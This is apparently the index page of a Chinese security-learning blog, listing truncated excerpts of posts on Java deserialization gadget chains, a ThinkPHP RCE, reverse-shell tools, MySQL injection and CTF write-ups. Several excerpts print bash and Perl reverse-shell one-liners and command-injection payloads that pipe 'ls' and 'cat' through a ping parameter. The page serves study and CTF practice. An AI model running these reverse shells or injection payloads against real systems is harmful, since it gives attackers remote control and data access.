java反序列化(四)CommonsCollections篇 — CC1Plus
CC1 plus(不受jdk版本限制) 前文所分析利用的CC1链会受到jdk的版本限制 受jdk版本限制原因: 在jdk1.8.0_71之后的版本AnnotationInvocationHandler.readObject()均被重写,删掉了其中的menbervalue.setValue()执行代码 以下两条两条CC1的链子可以忽略jdk版本限制(…
2021-12-31 22:09
|
|
|
631
315 字
|
6 分钟
探究CC链的前置知识
探究CC链的前置知识 这里是各种探究CC链的过程中使用到的类的详细讲解,一边探究CC链一边把Gadget chain出现的类补进来 ..... CommonsCollections Transformer Transformer为Commons Collections中提供的一个接口 ConstantTransformer ConstantTr…
2021-12-31 14:47
|
|
|
546
700 字
|
10 分钟
java反序列化(三)CommonsCollections篇 — CC1
java反序列化(三)CommonsCollections篇 -- CC1 前言 Commons Collections的利用链也被称为cc链,在学习反序列化漏洞必不可少的一个部分。Apache Commons Collections是Java中应用广泛的一个库,包括Weblogic、JBoss、WebSphere、Jenkins等知名大型Java…
2021-12-31 6:06
|
|
|
645
1426 字
|
18 分钟
java的反序列化(二):URLDNS
利用流程 可通过java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://host" > payload.bin生成payload 测试 : python exploit_deserlab.py [host] [port] payload.bin 执行反序列化函数r…
2021-12-29 21:06
|
|
|
456
236 字
|
4 分钟
thinkphp(一) : 5.0.1~22控制器RCE
RCE版本范围 : 5.0.1~22 import requests,time args="" data={} # debug=false时无RCE,debug=true时5.0.21~22 # data={"_method":"__construct","filter"…
2021-12-23 22:16
|
|
|
869
113 字
|
6 分钟
java的反序列化(一)What’s java’s serialize&unserialize
序列化和反序列化 序列化 将一个类对象转换成为一段字节序列保存在文件中,和java的原生类writeObject对应 反序列化 将对象序列化生成的字节序列还原为一个对象,和java的原生类readObject对应 序列化条件 该类必须实现 java.io.Serializable 对象 该类的所有属性必须是可序列化的。如果有一个属性不是可序列化的,…
2021-12-23 21:42
|
|
|
514
1104 字
|
14 分钟
反弹shell工具(2)
利用netcat反弹shell Netcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。 目前,默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布…
2021-11-22 21:37
|
|
|
1,270
1638 字
|
10 分钟
JavaScript对象
JavaScript对象 Documetn Document Document 接口表示任何在浏览器中载入的网页,并作为网页内容的入口,也就是DOM 树。DOM 树包含了像 <body> 、<table> 这样的元素,以及大量其他元素。它向网页文档本身提供了全局操作功能,能解决如何获取页面的 URL ,如何在文档中创建一个新…
2021-11-17 21:48
|
|
|
602
296 字
|
3 分钟
Pyhton-@property装饰器-__getattr__()-__getattribute()
@property pyton内置的@property装饰器可以把一个方法变成一个属性 class User: def __init__(self): self.username='admin' self.password='123456' @property #pyton内置的@property装饰器可以把…
2021-11-17 20:38
|
|
|
806
209 字
|
5 分钟
反弹shell工具(1)
Bash 与linux发行版本有关 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 PERL perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobynam…
2021-11-17 18:41
|
|
|
608
139 字
|
1 分钟内
利用XSS进行CSRF,同源策略
CSRF 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF。 CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,…
2021-11-17 18:22
|
|
|
616
55 字
|
1 分钟内
create_function()函数结合usort()函数getshell
create_function()函数 官方文档介绍 示例代码: <?php $newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);'); echo "New anon…
2021-11-17 18:02
|
|
|
610
509 字
|
5 分钟
软链接连接目录
什么是软链接? 软连接是linux中一个常用命令, 它的功能是为某一个文件在另外一个位置建立一个同步的链接。 软连接类似与c语言中的指针,传递的是文件的地址; 更形象一些,软连接类似于WINDOWS系统中的快捷方式。 例如,在a文件夹下存在一个文件hello,如果在b文件夹下也需要访问hello文件,那么一个做法就是把hello复制到b文件夹下,另…
2021-11-16 13:52
|
|
|
710
357 字
|
6 分钟
SQL慢查询
是从深育杯一道mysql注入知道的 使用示例 详细讲解 ...
2021-11-16 9:48
|
|
|
562
169 字
|
5 分钟
mysql注入-一般方法篇
一个很久之前学习mysql注入的笔记 (1)增删改查语句 Insert : insert into mrkaixin values( ' 1’ , ' nepnep'); Delete : delete from mrkaixin where xXXX; Update : update mrkaixin set name = 'x’ where i…
2021-11-05 13:54
|
|
|
793
2175 字
|
10 分钟
BUU_WEB_Note(二)
BUU_WEB_Note(二) 1. [GXYCTF2019] Ping Ping Ping 打开后提示传入值为ip 利用管道符查询,输入:?ip=127.0.0.1|ls 输入:?ip=127.0.0.1|cat falg.php 输入:?ip=127.0.0.1|cat index.php还是一样,怀疑空格符被过滤,改为{$IFS$}还是不行,…
2021-11-05 1:35
|
|
|
329
6615 字
|
29 分钟
BUU_WEB_Note
[BUUCTF 2018]Online Tool 考点:escapeshellarg和escapeshellcmd函数 考点:PHP RCE <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_…
2021-11-04 1:05
|
|
|
665
5900 字
|
1.5 小时